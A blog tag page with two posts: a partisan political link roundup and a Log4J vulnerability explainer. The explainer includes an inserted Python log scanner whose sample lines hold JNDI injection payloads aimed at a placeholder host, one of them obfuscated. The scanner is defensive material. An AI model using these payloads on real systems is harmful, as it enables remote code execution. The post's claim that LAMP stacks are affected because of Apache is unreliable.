Posts Tagged ‘Open Source’

LinkSwarm for May 5, 2023

Friday, May 5th, 2023

A Soros-backed DA is stepping down, a Harvard prof lying about playing footsie with commies sentenced, and another Democratic fundraiser convicted of fraud. It’s the Friday LinkSwarm!

  • Good news, everyone! Soros-backed St. Louis Democrat DA Kim Gardner has resigned.

    On Thursday, a progressive prosecutor who was notoriously funded by far-left billionaire George Soros announced her resignation, after months of bipartisan pressure to do so.

    Fox News reports that Kim Gardner, the Circuit Attorney for St. Louis, announced that her resignation will be effective June 1st. Gardner was one of the first prosecutors in the country to be bankrolled by Soros, who has since expanded his efforts to other major cities across the country. She was first elected in 2016 and re-elected in 2020, largely due to Soros’ financial backing. Prior to her resignation announcement, she had declared her intention to run for a third term in 2024.

    After years of criticism for being soft on crime and siding with criminals over victims, Gardner faced a whole new wave of criticism from both parties over an incident in February: Teenage volleyball player Janae Edmonson, who was visiting St. Louis from Tennessee for a tournament, was hit by an out-of-control car while crossing the road; although Edmonson survived, she had to have both of her legs amputated.

    The driver of the car was Daniel Riley, a man who was out on bond while awaiting trial for an armed robbery case. It was later revealed that Riley had violated the terms of bond dozens of times, but was never arrested. When the blame turned to Gardner for failing to keep him off the streets, she falsely claimed that her office had attempted to have Riley jailed once again, only to be denied by a judge; there are no records of her office filing any such motion or otherwise seeking the revocation of Riley’s bond.

    Following the Edmonson incident, Missouri Attorney General Andrew Bailey (R-Mo.) filed a petition quo warranto, the process by which the state attorney general can fire a prosecutor who has been determined to be neglectful of her duties. Bailey claimed that as many as 12,000 criminal cases have been dismissed due to Gardner’s failures, with another 9,000 having been thrown out right before they were set to go to trial, due to Gardner’s office refusing to provide evidence and speedy trials for defendants.

    After Gardner’s announcement, Bailey released a statement demanding that she vacate her office immediately, rather than wait for another month.

  • The Biden Banking Crisis continues to bubble along. First Horizon, PacWest, and Western Alliance are the new banks facing trouble. (Hat tip: Stephen Green at Instapundit.)
  • “Wagner Chief to Pull Mercenaries Out of Bakhmut over Ammunition Dispute with Russian Military.”

    Wagner Group chief Yevgeny Prigozhin said he will pull his mercenaries out of the meat grinder that is the Ukrainian city of Bakhmut on May 10, one day after Russia’s Victory Day Celebrations, which Russian president Vladimir Putin is expected to use to shore up support for the Russian invasion.

    The Wagner Group, a well-known mercenary unit known to be one of Russia’s most competent fighting divisions, is leading the charge on Bakhmut, a city that that has gained outsized symbolic importance.

    “I am withdrawing the Wagner PMC units from Bakhmut, because in the absence of ammunition they are doomed to senseless death,” Prigozhin said in full military fatigues and carrying an automatic weapon. The video he released showed him surrounded by masked Wagner fighters. Prigozhin also released a statement to the same effect.

    His forces had no choice but to withdraw to rear bases to “lick the wounds,” said Prigozhin, as translated by the Washington Post. If Wagner goes through with the withdrawal, it would be viewed as catastrophic in terms of morale. The Russian invasion has ground to a standstill after large-scale Russian and Ukrainian offensives last year. Kyiv, which has been amassing ammunitions including tanks and fighter jets, is expected to launch a fresh counterattack in the very near future.

    Prigozhin also launched a remarkable video tirade overnight on Telegram in which he displayed bodies of dozens of Wagner soldiers killed in Bakhmut. He angrily laid into the Russian Defense minister Sergei Shoigu and Valery Gerasimov, chief of the general staff of the Russian armed forces, for supplying Wagner with only 30 percent of the ammunition that’s needed.

    The statement released today claimed that number was even lower, standing at 10 percent.

    One caveat is that we’ve heard complaints from Prigozhin about his ammo supply before.

  • Russian soldiers dig trenches in horse graveyard in occupied Ukraine. Now they have anthrax.
  • “Biden CIA chief met with Epstein several times after financier convicted of child sex crime. Central Intelligence Agency Director William Burns had three meetings with Jeffrey Epstein in 2014, when the top spy official was deputy secretary of state and after Epstein was convicted of child sex exploitation.” (Hat tip: Stephen Green at Instapundit.)

  • “Harvard chemistry professor sentenced for lying about ties to CCP…Former Harvard University Chemistry Department Chair Charles M. Lieber was sentenced Wednesday to time served and over $80,000 in fines for committing fraud and for failing to disclose his connections to the Chinese Communist Party.” (Hat tip: Instapundit.)
  • “Longtime Democratic Campaign Strategist Charged with Election Fraud.” And completely different than the Democratic Party fundraiser convicted of fraud last week.

    New Jersey Democratic campaign strategist James Devine was charged with election fraud for allegedly submitting more than 1,900 fake petitions to help secure a 2021 Democratic gubernatorial primary ballot spot for candidate Lisa McCormick, New Jersey Attorney General Matthew Platkin announced Tuesday.

    Devine was McCormick’s campaign manager and sent the fake voter certifications to the New Jersey Secretary of State’s Division of Elections via email in April 2021, but the New Jersey Democratic State Committee challenged his attempt days later, arguing that all the forms featured the same style of signature and at least one of the named voters was deceased, Platkin said.

    A judge subsequently took McCormick off the primary ballot, and Devine is now charged with third-degree offenses concerning nomination certificates or petitions, tampering with public records or information and fourth-degree falsifying or tampering with records.

    (Hat tip: Instapundit.)

  • “Kansas Becomes 1st State to Pass Law Defining Gender as a Person’s Sex at Birth.” One down, forty-nine to go…
  • Killer in Satan’s service finds the left’s child sexual mutilation fetish disgusting.
  • Shots of Minneapolis before and after the Antifa/BLM riots of 2020.
  • “El Paso Engulfed In ‘Mass Migration Dumpster Fire’ As State Of Emergency Declared.”
  • Accused serial black widow killer charged with murdering her fifth husband.
  • “You just killed two people tonight.” “Yeah, but when can I go back to school?”
  • California banning diesel effective 2036.
  • Could sexbots and AI end humanity?
  • “Googlers angry about CEO’s $226M pay after cuts in perks and 12,000 layoffs.” Funny how you never hear the “Occupy Wall Street” crowd going after the Sundar Pichais of the world.
  • Speaking of Google, I’m hardly an expert on AI, but here’s a piece that claims Google is getting its clock cleaned by Open Source AI.

    LoRA updates are very cheap to produce (~$100) for the most popular model sizes. This means that almost anyone with an idea can generate one and distribute it. Training times under a day are the norm. At that pace, it doesn’t take long before the cumulative effect of all of these fine-tunings overcomes starting off at a size disadvantage. Indeed, in terms of engineer-hours, the pace of improvement from these models vastly outstrips what we can do with our largest variants, and the best are already largely indistinguishable from ChatGPT. Focusing on maintaining some of the largest models on the planet actually puts us at a disadvantage.

    (Hat tip: Ace of Spades HQ.)

  • The Case of the Disappearing Swiss Cheese Holes.
  • Wes Anderson’s Star Wars.
  • A nice stroke of book collecting luck: I picked up an inscribed presentation copy of H. G. Wells’ The Food of the Gods. Or rather, I picked it up as part of a multibook lot back in February and didn’t realize it was inscribed until last week.
  • “Biden Deploys 1,500 Troops At Border To Help Register New Voters.”
  • “Pro Disc Golfer Disqualified After Testing Negative For Cannabis.”
Log4J and Internet Castles Made of Sand

Thursday, December 16th, 2021

If you work outside of a tech company, chances are you’ve spent this week primarily concerned with getting ready for Christmas. If you work inside a tech company, there’s a significant chance your company spent much of this week patching a critical vulnerability in an open source Java logging library called Log4J.

Here’s a non-technical explanation of the problem:

It’s a vulnerability that was discovered in a piece of free, open source software called log4j. This software is used by thousands of websites and applications, to perform mundane functions most people don’t think about, such as logging information for use by that website’s developers, for debugging and other purposes.

Every web application needs functionality like this, and as a result, the use of log4j is ubiquitous worldwide. Unfortunately, it turns out log4j has a previously undiscovered security vulnerability where data sent to it through that website — if it contains a special sequence of characters — results in log4j automatically fetching additional software from an external website and running it. If a cyberattacker exploits this, they can make the server that is running log4j run any software they want — including software that can completely take over that server. This is known as a Remote Code Execution (RCE) attack.

To use a technical phrase, this is Really Bad.

The net result is that, left unaddressed, cyberattackers right now can completely take over thousands of websites and online applications, allowing them to steal money, data, and access. The security community has been completely focused on this vulnerability for the past two days, and updating servers running log4j as quickly as possible to protect against this vulnerability.

The good news is that mitigations are relatively easy to implement. The bad news is that left unmitigated, the vulnerability is extremely easy to exploit. iCloud, Minecraft, Baidu, and many other sites have been confirmed to be vulnerable so far, and you’ll likely hear more about many other sites being vulnerable in the coming days.
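As an added illustration that is not part of the original post: the “special sequence of characters” is a Log4j lookup of the form `${jndi:...}`, and a defender scanning logs for it must first collapse the nested lookups (`${lower:j}`, `${::-j}`, and so on) that are used to disguise it. The function names, the sample log lines and the `example.invalid` host below are constructed for this example.

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: a body with no nested braces or dollar signs.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization, matched case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve one innermost lookup to the text Log4j would substitute.

    Covers the common disguises: ${lower:X}, ${upper:X} and the default-value
    form ${name:-X}, which yields X when the lookup name is empty or unknown.
    Any other lookup is returned unchanged so the caller can still see it.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return "${" + body + "}"


def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    while True:
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            return text
        text = resolved


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized line) for lines carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((number, norm))
    return hits


# Constructed access-log lines: one plain, two carrying the lookup (the second
# disguised with nested lookups), one with a benign, non-JNDI lookup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://example.invalid/a}"',
    '10.0.0.4 - - "GET /docs/${date:yyyy} HTTP/1.1" 404 "curl/7.79"',
]
```

Running `scan_log_lines(SAMPLE_ACCESS_LOG)` flags lines 2 and 3 only; a naive search for the literal string `${jndi:` would miss line 3.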

And those companies are just the tip of the iceberg. LAMP stacks (Linux, Apache, MySQL, and PHP) are used as the technological underpinnings for a wide variety of web applications of all sizes. (It’s not universal, as NGINX has taken over as a market leader from Apache, and there are still a few all-Microsoft houses that use IIS, and neither of them has the vulnerability.)

Open Source has been a revolutionary invention because it provides rapid development by armies of distributed developers, and Linus’s Law states that “with enough eyes, all bugs are shallow.” But there are tens of thousands of Open Source components out there running critical infrastructure that haven’t had nearly as many eyes on the code as the Linux kernel. It’s simply the nature of the beast. XKCD had a cartoon for this occasion:

Internet applications gain usefulness from widespread adoption and the number of other components they tie into and support. You know what creates new vulnerabilities? A larger user base and the number of other components they tie into and support, which creates more attack surfaces for malicious actors to exploit.

The flaw isn’t the fault of Random Guy in Nebraska, the fault is the company adopting software that they can’t possibly test for all the use-cases they’re going to use it for. Surprise! Just about every high tech company in the world is in the same boat. Pretty much everyone uses a wide panoply of open source tools for their Internet applications, and no one can test all the permutations of how each component might be put to use.

You can’t eliminate the risk, you can only minimize and mitigate it. You can use containerization strategies (Docker, Kubernetes, containerd, etc.) to minimize attack surfaces and limit contagion. You can run all your code through security scanning tools on your CI/CD platform of choice. You can do constant testing and keep rolling backups of everything to limit risk and speed recovery. (You can also train your employees not to click on random email links without verifying the sender is who they say they are, and not to give any account information or passwords over the phone, and train them enough so that the lessons stick, even though phishing and social engineering weren’t factors in the Log4J vulnerability.)

But there’s still a good chance that the platform you’re using today is different from the platform you’ll be using ten years from now, and you’ll have to go through the same learning process, discovering new vulnerabilities for the new platform all over again.

Castles made of sand all fall into the sea eventually…